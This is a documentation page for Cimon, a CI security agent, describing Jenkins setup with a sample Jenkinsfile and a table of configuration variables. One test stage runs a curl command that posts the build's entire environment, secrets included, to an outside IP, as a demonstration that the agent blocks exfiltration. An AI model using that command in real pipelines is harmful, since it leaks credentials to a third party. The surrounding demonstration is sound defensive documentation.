Skip to main content

Jenkins (Beta)

Jenkins does not offer out-of-the-box hosted runners like GitHub Actions and Azure Pipelines, but provides great flexibility to use self-hosted runners of varying execution types.

Jenkins Self-Hosted Runners Support

In Jenkins, there are two types of execution. Creating virtual or physical nodes that will execute jobs, or setting up a cloud (e.g., Docker-based, K8s-based, etc.) that will provision the job.

Both cases require the underlying operating system to support the minimal requirements for running eBPF code and loading it. You can find more information in the self-hosted support and troubleshooting section.

Cimon Jenkins Pipeline

Jenkins supports running Cimon on all major pipeline types - "Freestyle project", "Pipeline", and "Multibranch Pipeline". As an example, here is a Jenkinsfile that creates a build and runs Cimon:

pipeline {
agent any

environment {
CIMON_CLIENT_ID = credentials("cimon-client-id")
CIMON_SECRET = credentials("cimon-secret")
}

options {
disableConcurrentBuilds()
}

stages {
stage('Run Cimon') {
steps {
sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/run_cimon.sh | sudo -E sh -s -- agent'
}
}

stage('Test') {
steps {
sh 'git clone https://github.com/octocat/Hello-World Hello-World'
}
}

stage('Allowed network traffic') {
steps {
sh 'curl -sm 1 https://34.121.34.97 || true'
}
}

stage('Allowed network traffic (hostname)') {
steps {
sh 'wget --quiet --timeout 1 https://cycode.com || true'
sh 'wget --quiet --timeout 1 https://registry.npmjs.org || true'
}
}

stage('Forbidden network traffic (IP)') {
steps {
sh 'curl -sm 1 -d "$(env)" https://34.121.34.100/upload/v2 || true'
}
}

stage('Forbidden network traffic (hostname)') {
steps {
sh 'wget --quiet --timeout 1 https://yahoo.com || true'
}
}
}
post {
always {
cleanWs()
sh """
curl -sSfL https://cimon-releases.s3.amazonaws.com/stop_cimon.sh | sudo -E sh
"""
}
}
}

Explanation:

environment {
CIMON_CLIENT_ID = credentials("cimon-client-id")
CIMON_SECRET = credentials("cimon-secret")
}

Cimon receives input parameters through environment variables. Security policies will be configured by these variables.

options {
disableConcurrentBuilds()
}

To enforce Cimon installation step running first, this configuration option must be enabled.

stage('Run Cimon') {
steps {
sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/run_cimon.sh | sudo -E sh -s -- agent'
}
}

Installing Cimon agent on the runner.

post {
always {
cleanWs()
sh """
curl -sSfL https://cimon-releases.s3.amazonaws.com/stop_cimon.sh | sudo -E sh
"""
}
}

Cimon agent is stopped, and the report is printed.

Usage

Here are the parameters that are supported:

Environment VariableDefaultDescription
CIMON_CLIENT_IDCimon client ID for authentication
CIMON_SECRETCimon secret for authentication
CIMON_URLCimon endpoint for authentication
CIMON_PREVENTfalseEnable prevention mode
CIMON_ALLOWED_IPSA comma or white space separated list of allowed IP addresses
CIMON_ALLOWED_HOSTSA comma or white space separated list of allowed domain names. The left-most label can be the wildcard character (*) to match multiple subdomains (e.g. *.example.com).
CIMON_IGNORED_IP_NETSA comma or white space separated list of ignored IP networks in CIDR notation, e.g. 10.0.0.0/8, 172.16.0.0/12. This setting is mandatory if your workflow runs containers attached to a custom network with configured sub-range. In other words, inter-container networking is usually ignored by Cimon. Cimon implicitly ignores 10.0.0.0/8 and 172.16.0.0/12 networks.
CIMON_REPORT_PROCESS_TREEfalseEnable to report the process tree
CIMON_SLACK_WEBHOOK_ENDPOINTSlack webhook endpoint to report security events
CIMON_LOG_LEVELinfoLog level (Used for debugging)

Report

The final report is printed in the build logs of each job by Cimon.